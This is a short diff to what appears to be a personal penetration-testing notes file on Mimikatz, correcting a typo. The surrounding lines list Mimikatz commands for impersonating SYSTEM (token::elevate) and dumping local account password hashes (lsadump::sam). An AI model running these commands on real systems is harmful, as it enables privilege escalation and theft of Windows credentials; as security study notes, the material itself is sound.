amandaguglieri/hackinglife/docs/mimikatz.md

 # Impersonate as NT Authority/SYSTEM (having permissions for it).
 token::elevate

-# List users and hashes of the machina
+# List users and hashes of the machine
 lsadump::sam

 # Enable debug mode for our user